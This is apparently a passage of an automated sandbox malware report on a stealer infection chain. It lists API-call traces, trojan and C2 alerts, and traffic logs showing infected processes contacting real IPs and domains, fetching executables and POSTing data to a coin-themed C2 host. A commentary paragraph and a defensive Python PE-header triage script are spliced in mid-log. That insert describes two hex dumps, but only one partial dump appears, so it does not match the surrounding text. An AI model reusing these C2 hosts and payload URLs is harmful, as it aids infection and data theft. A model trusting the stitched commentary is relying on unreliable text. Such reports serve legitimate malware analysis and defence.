Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: BB8A.exe, 0000000C.00000000.759454697.0000000000413000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.765793505.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000010.00000002.807243826.0000000004DE0000.00000002.00020000.sdmp
Source: Binary string: C:\bajudag\zexi\yedu49\hecicu\2-tiwi\cabilok\fes.pdb source: D936.exe, 00000011.00000000.776580962.0000000000401000.00000020.00020000.sdmp, krmdinzg.exe, 00000020.00000000.795753078.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\nobaniz_sakalacato34.pdb source: ECD2MpEBSf.exe, ECD2MpEBSf.exe, 00000000.00000002.667356464.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000000.00000000.661810290.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000001.00000000.664620927.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000000.751866281.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000002.758107473.0000000000401000.00000020.00020000.sdmp, jgdhbua, 0000000B.00000000.755033215.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000010.00000003.778942214.0000000000B3E000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777377914.0000000000B3E000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_004198CC GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00688A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_006812E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_006814D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00686090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00689930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00689BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00689D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,

                      Networking:

                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.4:49891 -> 74.201.28.62:80
                      Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49912 -> 185.163.204.24:80
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exe | Domain query: patmushta.info
                      Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
                      Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 104.47.53.36 25
                      Source: C:\Windows\explorer.exe | Domain query: unicupload.top
                      Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
                      Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exe | Domain query: goo.su
                      Source: C:\Windows\explorer.exe | Domain query: transfer.sh
                      Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
                      May check the online IP address of the machine
                      Source: C:\Users\user\AppData\Local\Temp\CADF.exe | DNS query: name: iplogger.org
                      Source: unknown | DNS query: name: iplogger.org
                      Source: global traffic | HTTP traffic detected: GET /book/KB5009812.png HTTP/1.1 | Host: 74.201.28.62 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: 185.163.204.22
                      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Content-Length: 128 | Host: 185.163.204.24
                      Source: global traffic | HTTP traffic detected: GET //l/f/RGwRWn4BZ2GIX1a3oIgO/6bf5d5b41363c3e6b44705458de7ee6f935456db HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
                      Source: global traffic | HTTP traffic detected: GET //l/f/RGwRWn4BZ2GIX1a3oIgO/7e7a36a98c7545dda4f314e30bbcbe9a8ba64652 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:29:13 GMT | Content-Type: application/x-msdos-program | Content-Length: 301056 | Connection: close | Last-Modified: Mon, 10 Jan 2022 12:06:49 GMT | ETag: "49800-5d5392be00934" | Accept-Ranges: bytes
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:29:17 GMT | Content-Type: application/x-msdos-program | Content-Length: 324608 | Connection: close | Last-Modified: Fri, 14 Jan 2022 19:29:01 GMT | ETag: "4f400-5d58fd0ac7fe8" | Accept-Ranges: bytes
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:29:49 GMT | Content-Type: application/x-msdos-program | Content-Length: 905216 | Connection: close | Last-Modified: Thu, 13 Jan 2022 15:53:07 GMT | ETag: "dd000-5d578aeb4049d" | Accept-Ranges: bytes
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 14 Jan 2022 19:29:55 GMT | Server: Apache/2.4.38 (Win32) PHP/7.1.26 | Last-Modified: Fri, 14 Jan 2022 17:15:09 GMT | ETag: "6ff1c7-5d58df1eec44d" | Accept-Ranges: bytes | Content-Length: 7336391 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: application/octet-stream | Last-Modified: Fri, 14 Jan 2022 18:57:27 GMT | Accept-Ranges: bytes | ETag: "9bd1193789d81:0" | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | Date: Fri, 14 Jan 2022 19:30:02 GMT | Content-Length: 54272
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.18.0 (Ubuntu) | Date: Fri, 14 Jan 2022 19:30:12 GMT | Content-Type: application/octet-stream | Content-Length: 916735 | Connection: keep-alive | Last-Modified: Fri, 07 Jan 2022 23:09:58 GMT | ETag: "61d8c846-dfcff" | Accept-Ranges: bytes
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:30:12 GMT | Content-Type: application/x-msdos-program | Content-Length: 905216 | Connection: close | Last-Modified: Thu, 13 Jan 2022 15:53:07 GMT | ETag: "dd000-5d578aeb4049d" | Accept-Ranges: bytes
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:30:18 GMT | Content-Type: application/x-msdos-program | Content-Length: 557664 | Connection: close | Last-Modified: Thu, 13 Jan 2022 19:20:04 GMT | ETag: "88260-5d57b92d7ebed" | Accept-Ranges: bytes
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 14 Jan 2022 19:30:21 GMT | Server: Apache/2.4.38 (Win32) PHP/7.1.26 | Last-Modified: Fri, 14 Jan 2022 16:06:29 GMT | ETag: "6ff1c1-5d58cfc604e56" | Accept-Ranges: bytes | Content-Length: 7336385 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
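Both responses above deliver PE files. The first (nginx, application/x-msdos-program, 557664 bytes) starts with 4d 5a followed by arbitrary bytes where the DOS header fields and stub normally sit, carries no "This program cannot be run in DOS mode" text, and has its PE header at offset 0x100 with Machine 0x014c (i386), four sections (.idata, .pdata, .rsrc, .didata) and TimeDateStamp 0xab35add6, a date in 2061. The second (Apache, application/x-msdownload, 7336385 bytes) has the standard stub and a Rich header, Machine 0x8664, seven sections and TimeDateStamp 0x61e19ecb (14 Jan 2022, consistent with its Last-Modified). The script below is an added example, not code from the report or from the samples: it rebuilds the two headers with struct from the values visible in the dumps (constructed inputs, not byte-for-byte copies; the optional header is zero-filled) and applies the header-only checks an analyst would run before unpacking: non-standard DOS stub, TimeDateStamp later than the capture (assumed here to be the second response's Date header, 14 Jan 2022 19:30:21 GMT), an executable section with SizeOfRawData 0 (the space a packer unpacks into), and a section that is both writable and executable.

```python
"""Header triage for the two PE responses above (added example; the inputs are
CONSTRUCTED with struct from the header values visible in the dumps, they are
not byte-for-byte copies of the samples)."""
import datetime as dt
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
DOS_MODE_MSG = b"This program cannot be run in DOS mode."
E_LFANEW = 0x100           # both dumps place "PE\0\0" at offset 0x100
CAPTURE_TIME = 1642188621  # Date header of the second response (assumed capture time)


def build_pe(machine, timestamp, sections, dos_fields, dos_stub, opt_size=0xE0):
    """MZ header + stub + PE signature + COFF header + zero-filled optional header
    + section table; sections = (name, vsize, vaddr, rawsize, rawptr, chars)."""
    head = bytearray(E_LFANEW)
    head[0:2] = b"MZ"
    head[2:60] = dos_fields.ljust(58, b"\0")[:58]       # e_cblp .. e_res2
    struct.pack_into("<I", head, 0x3C, E_LFANEW)
    stub = dos_stub[:E_LFANEW - 0x40]
    head[0x40:0x40 + len(stub)] = stub
    coff = struct.pack("<IHHIIIHH", 0x4550, machine, len(sections), timestamp, 0, 0, opt_size, 0x0102)
    magic = 0x10B if machine == 0x14C else 0x20B        # PE32 / PE32+
    opt = struct.pack("<H", magic).ljust(opt_size, b"\0")
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, vs, va, rs, rp, ch in sections)
    return bytes(head) + coff + opt + table


def parse_pe_header(data):
    """Machine, TimeDateStamp, the bytes between DOS header and e_lfanew, section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew=%#x" % e_lfanew)
    machine, nsec, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(nsec):
        name, vs, va, rs, rp, _, _, _, _, ch = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vs, "vaddr": va, "rawsize": rs, "rawptr": rp, "chars": ch})
    return {"machine": machine, "timestamp": ts, "dos_stub": bytes(data[0x40:e_lfanew]), "sections": sections}


def triage(data, captured_at=CAPTURE_TIME):
    """Header-only checks that separate a packed loader from an ordinary compiler build."""
    hdr = parse_pe_header(data)
    findings = []
    if DOS_MODE_MSG not in hdr["dos_stub"]:
        findings.append("nonstandard DOS stub: no 'DOS mode' message before e_lfanew")
    if hdr["timestamp"] > captured_at:
        when = dt.datetime.fromtimestamp(hdr["timestamp"], dt.timezone.utc).date()
        findings.append("TimeDateStamp %s is after capture time" % when)
    for s in hdr["sections"]:
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["rawsize"] == 0:
            findings.append("%s: executable but SizeOfRawData 0 (packer unpacks into it)" % s["name"])
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append("%s: RWX section" % s["name"])
    if not any(s["chars"] & IMAGE_SCN_MEM_EXECUTE for s in hdr["sections"]):
        findings.append("no executable section")
    return findings


# First response (nginx, application/x-msdos-program): MZ then arbitrary bytes,
# no DOS-mode text, i386, 4 sections, TimeDateStamp 0xab35add6 (year 2061).
SAMPLE_A = build_pe(
    machine=0x14C, timestamp=0xAB35ADD6,
    dos_fields=bytes.fromhex("e21517e8ec6fac01a3678827b03a0728339808dd3332a2e3"
                             "d0dbdf66f6e9c89bf0ce4327427b6219d6e4190905f616cd"
                             "2b9ac352c6c79888643a"),
    dos_stub=bytes.fromhex("0b51d100"),
    sections=[(".idata", 0x36000, 0x1000, 0, 0x400, 0x60000000),
              (".pdata", 0x1000, 0x37000, 0x200, 0x400, 0xC0000040),
              (".rsrc", 0x32950, 0x38000, 0x30630, 0x600, 0x40000040),
              (".didata", 0x18000, 0x6B000, 0x178FC, 0x30E00, 0xE0000040)])

# Second response (Apache, application/x-msdownload): standard stub, x64,
# 7 sections, TimeDateStamp 0x61e19ecb (14 Jan 2022, matches Last-Modified).
SAMPLE_B = build_pe(
    machine=0x8664, timestamp=0x61E19ECB, opt_size=0xF0,
    dos_fields=bytes.fromhex("90000300000004000000ffff0000b80000000000000040000000"),
    dos_stub=bytes.fromhex("0e1fba0e00b409cd21b8014ccd21") + DOS_MODE_MSG + b"\r\r\n$",
    sections=[(".text", 0x235D0, 0x1000, 0x23600, 0x400, 0x60000020),
              (".rdata", 0x11898, 0x25000, 0x11A00, 0x23A00, 0x40000040),
              (".data", 0x10398, 0x37000, 0xC00, 0x35400, 0xC0000040),
              (".pdata", 0x1DE8, 0x48000, 0x1E00, 0x36000, 0x40000040),
              ("_RDATA", 0xF4, 0x4A000, 0x200, 0x37E00, 0x40000040),
              (".rsrc", 0x5E3, 0x4B000, 0x600, 0x38000, 0x40000040),
              (".reloc", 0x748, 0x4C000, 0x800, 0x38600, 0x42000040)])

if __name__ == "__main__":
    for label, blob in (("first", SAMPLE_A), ("second", SAMPLE_B)):
        print(label, triage(blob) or ["no header anomalies"])
```

The first header trips every check (arbitrary DOS bytes, a 2061 timestamp, an executable .idata with no raw data, an RWX .didata), the second trips none; on a real download replace the constructed blobs with the first few kilobytes of the response body and supply the capture time from the HTTP Date header.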
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49952 version: TLS 1.0
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pieilmtu.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 280 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nwilglig.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 282 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nfbqltka.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 251 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cvdhldsf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 201 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qcjatd.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 351 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xrovmrlel.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 175 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cmgcwqatb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 319 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://owgvnnuoml.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 154 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://opviax.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 304 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nunmqyect.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 348 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kyadmhioim.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 344 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rnsdjgkq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 211 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sjgvu.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 198 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cqsurm.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 324 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gculkm.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 148 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ifvodd.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 266 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lvmiyiiy.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 227 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pegqugok.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 361 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uhiqru.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 211 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jbinuykf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 252 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kybdaip.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 283 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://doynnfulb.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 294 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nxysak.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 146 | Host: host-data-coin-11.com
